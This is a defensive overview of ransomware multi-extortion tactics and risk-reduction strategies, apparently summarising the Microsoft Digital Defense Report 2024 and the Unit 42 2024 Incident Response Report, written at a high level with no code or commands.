Tactics Used by Ransomware Groups to Increase Extortion

The sources, the Microsoft Digital Defense Report 2024 and the Unit 42 2024 Incident Response Report, paint a clear picture: the methods attackers use are constantly evolving, demanding that organizations of all sizes and industries stay informed and adapt their security strategies accordingly. Attackers are becoming faster, more sophisticated, and relentless in their pursuit of valuable data. Understanding their tactics and the weaknesses they exploit is paramount to bolstering defenses and mitigating risk.

The sources highlight various strategies ransomware actors are employing to intensify their extortion efforts:

• Multi-Extortion Tactics: Ransomware groups have moved beyond simply encrypting data and demanding payment for decryption. They are increasingly adopting a multi-pronged approach, deploying additional tactics to pressure victims into paying.
  • Data Theft and Publication: Stealing sensitive data before encryption and threatening to publish it online has become increasingly common. Victims often face the difficult choice of paying the ransom or risking the exposure of sensitive information, potentially damaging their reputation and incurring legal consequences.
  • Harassment: Some groups resort to harassing the organization's employees, customers, or partners to increase pressure. They might contact individuals directly, disclosing stolen data or making threats, aiming to create public embarrassment or disrupt business operations.
  • SEC Disclosure Threats: A recently observed tactic involves exploiting the SEC's disclosure rules. Attackers might report their victims to the SEC, even without a legitimate breach, threatening the organization with regulatory scrutiny and potential financial penalties. This strategy adds pressure and forces the victim to allocate resources to respond to the SEC, potentially increasing the likelihood of paying the ransom.
• Targeting Sensitive Sectors: Attackers increasingly focus on organizations highly sensitive to service disruptions. For example, the hospitality industry has become a prime target because any disruption to their operations, such as booking systems or guest services, can lead to significant financial losses and reputational damage.
• Sophisticated Social Engineering: Attackers are refining their social engineering techniques to gain initial access and bypass security measures.
  • IT Help Desk Scams: Impersonating legitimate users and contacting the help desk to reset passwords or change mobile numbers associated with accounts has become a highly effective tactic. Often, attackers use manipulative tactics to exploit the helpful nature of help desk personnel.
  • Buying Access from Brokers: Ransomware groups readily purchase stolen credentials or access to compromised systems from initial access brokers, allowing them to bypass initial security layers and gain a foothold within the target network.
• Exploiting Cloud Infrastructure: As organizations increasingly adopt cloud services, ransomware groups are adapting their tactics to exploit cloud environments.
  • Leveraging Misconfigured Cloud Services: Attackers take advantage of misconfigured cloud accounts and services to gain access, create rogue accounts, and potentially deploy their own malicious infrastructure within the victim's cloud environment.
• Speed and Automation: Attackers are constantly streamlining their operations to increase efficiency and reduce the time between intrusion and extortion.
  • Rapid Data Exfiltration: Attackers prioritize rapid data exfiltration to gain leverage quickly. In some cases, data is stolen within hours, leaving defenders with limited time to react before the extortion attempt begins.
  • Automation of Attack Stages: Various steps in the attack chain, including vulnerability scanning, exploitation, and even data collection and exfiltration, are being automated. This allows attackers to operate at scale and compromise multiple victims quickly.
• Adaptability and Innovation: Ransomware groups constantly refine their tactics to evade detection and counter evolving security measures.
  • Living Off the Land: Instead of relying solely on custom malware, attackers increasingly utilize legitimate tools and scripts already present in the victim's environment, making detection more challenging.
  • Defense Evasion Techniques: Attackers are becoming more adept at evading security tools, disabling or bypassing defenses to remain undetected for longer periods.
  • Adding Attacker-Controlled Infrastructure: Some groups deploy their own infrastructure within the victim's environment, such as virtual machines or cloud workloads, to gain persistent access and further obfuscate their activities.
• Potential Use of AI in the Future: While not yet widely observed, the sources speculate that AI could further enhance ransomware attacks.
  • AI-Enabled Malware Development: Attackers could use AI to generate new malware variants or customize existing ones, making detection and analysis more difficult.
  • AI-Assisted Social Engineering: AI-powered chatbots could be used to create more convincing phishing emails or engage in real-time social engineering, potentially fooling even security-aware individuals.

The sources provide a glimpse into the evolving landscape of ransomware extortion tactics. By understanding these strategies and adapting their security practices, organizations can better protect themselves from these evolving threats.

Strategies to Reduce the Risk of Ransomware Attacks

The sources offer several key strategies organizations should implement to reduce the risk of ransomware attacks:

• Prioritize Identity Security: The sources repeatedly emphasize protecting identities as the foundation of any cybersecurity strategy, especially against ransomware. “[A]ttackers don’t break in, they log in,” meaning credentials are the primary target. Strong identity security measures can significantly reduce risk exposure.
• Adopt Multi-Factor Authentication (MFA) Everywhere: The sources strongly advise implementing MFA across all systems and applications. MFA, especially phishing-resistant methods like app-based or hardware tokens, makes it significantly harder for attackers to gain access even if they obtain credentials.
• Implement Zero Trust Architecture: The sources recommend adopting a Zero Trust approach to network security. Zero Trust eliminates implicit trust, continuously validating every digital interaction. Key aspects include:
  • Strong authentication methods
  • Network segmentation to limit attackers' movement
  • Least privilege access to minimize the impact of compromised accounts
• Enhance Endpoint Security: The sources highlight the importance of robust endpoint protection to prevent and contain ransomware attacks. Key measures include:
  • Deploying endpoint detection and response (EDR) solutions on all desktops and servers, with a dedicated security operations team to monitor and respond to alerts
  • Ensuring consistent coverage of security controls across the entire network
  • Restricting and closely monitoring remote access, particularly Remote Desktop Protocol (RDP). Limiting the use of authorized remote management tools and enforcing MFA for remote access are crucial.
• Maintain a Robust Patch Management Process: Unpatched vulnerabilities are a major entry point for ransomware attacks. Organizations should:
  • Proactively identify and patch vulnerabilities on all internet-facing systems. This includes regular updates and applying security patches promptly
  • Implement attack surface management (ASM) tools to continuously monitor for vulnerabilities and exposures. Both external and internal ASM are necessary to reduce the overall attack surface.
• Develop a Comprehensive Incident Response Plan: The sources stress the importance of having a well-defined incident response plan to deal with ransomware attacks effectively. Key elements include:
  • Clearly defined roles, procedures, and timelines
  • Regularly testing and updating the plan, ideally with input from cybersecurity experts
  • Preparing for rapid containment, including procedures for credential resets
  • Establishing out-of-band communication systems to maintain communication during an attack
• Leverage AI and Automation: The sources suggest that AI and automation can be powerful tools in defending against ransomware, helping organizations to:
  • Improve threat detection and response times. AI-powered tools can sift through large amounts of data to identify anomalies and prioritize alerts.
  • Automate routine security tasks, such as vulnerability scanning and patch management, freeing up security personnel for more complex tasks.
• Secure Cloud Infrastructure: Organizations are increasingly moving workloads to the cloud, making cloud security essential. Key measures include:
  • Implementing a robust cloud security program and platform that provides comprehensive, cloud-native security features
  • Addressing cloud-specific security risks, such as misconfigurations, weak authentication, and excessive permissions.
• Educate Users and Build a Strong Security Culture: Human error remains a significant factor in ransomware attacks. Organizations should:
  • Provide regular security awareness training to all employees. Training should cover phishing, social engineering, password hygiene, and safe browsing practices.
  • Foster a security-conscious culture where employees understand their role in cybersecurity and feel empowered to report suspicious activity.
• Seek Expert Assistance: The sources recommend engaging with incident response experts to assist with:
  • Negotiating with threat actors if payment is deemed necessary. Experts can help avoid missteps and offer advice on navigating legal and technical challenges.
  • Conducting proactive assessments to evaluate the organization's security posture, such as ransomware readiness assessments and tabletop exercises.

The sources provide a comprehensive overview of ransomware threats and mitigation strategies. While the complexity and sophistication of attacks are increasing, the sources offer a hopeful perspective. By implementing these strategies and continuously adapting to the evolving threat landscape, organizations can significantly reduce their risk of falling victim to ransomware attacks.

Tactics Used in Multi-Extortion

The sources highlight that threat actors are increasingly employing multi-extortion tactics to increase pressure on victims to pay ransoms. Multi-extortion goes beyond simply encrypting data and demanding payment for its release. Instead, attackers layer on additional threats and actions to maximize their leverage and profits.

Here are some key tactics used in multi-extortion, as detailed in the sources:

• Data Theft and Public Disclosure: In addition to encrypting data, attackers often steal sensitive information before deploying ransomware. They then threaten to publicly release this data, often on dark web leak sites, if the ransom is not paid. This tactic adds an extra layer of pressure, as organizations face potential reputational damage, regulatory fines, and legal action if their data is exposed. The Unit 42 2024 Incident Response Report notes a 49% increase in postings on dark web leak sites from 2022 to 2023, highlighting the growing prevalence of this tactic.
• Harassment of Employees and Customers: Some threat actors resort to harassing an organization's employees or customers to further incentivize ransom payment. This can involve contacting individuals via email, phone, or social media, threatening to release their personal data or disrupt their lives if the organization does not comply with the ransom demands. While less common than data theft, the use of harassment in extortion cases where payment was made has significantly increased from less than 1% in 2021 to 27% in 2023.
• DDoS Attacks: Distributed denial of service (DDoS) attacks can be used as an additional extortion tactic, overwhelming an organization's online services with traffic to disrupt operations and pressure them into paying the ransom. The Microsoft Digital Defense Report 2024 highlights a fourfold increase in DDoS attacks mitigated in the second half of 2023 compared to the previous year.
• Exploitation of SEC Disclosure Rules: Recent reports suggest that threat actors are leveraging US Securities and Exchange Commission (SEC) disclosure rules for extortion. By reporting their victim to the SEC, threat actors can trigger investigations and potential legal repercussions, even if no breach has occurred. This tactic exploits the regulatory burden and potential reputational damage associated with SEC scrutiny, adding another layer of pressure on organizations to comply with ransom demands.

Effectiveness of Multi-Extortion Tactics

The sources suggest that multi-extortion tactics are proving effective for attackers. While the overall prevalence of different extortion tactics has remained relatively stable, the use of additional tactics like data theft and harassment has significantly increased in cases where victims ultimately paid the ransom. This indicates that these layered threats are successfully pushing more organizations to make payments.

The Evolving Landscape of Extortion

The sources emphasize that the extortion landscape is continually evolving, with attackers constantly adapting their techniques and finding new ways to exert pressure on victims. As organizations implement stronger security measures like multifactor authentication and data backups, threat actors are finding new ways to circumvent these defenses and leverage additional tactics to maximize their profits. The emergence of techniques like exploiting SEC disclosure rules and the increasing sophistication of data theft and harassment campaigns demonstrate the ongoing need for organizations to maintain vigilance and adapt their security strategies to counter these evolving threats.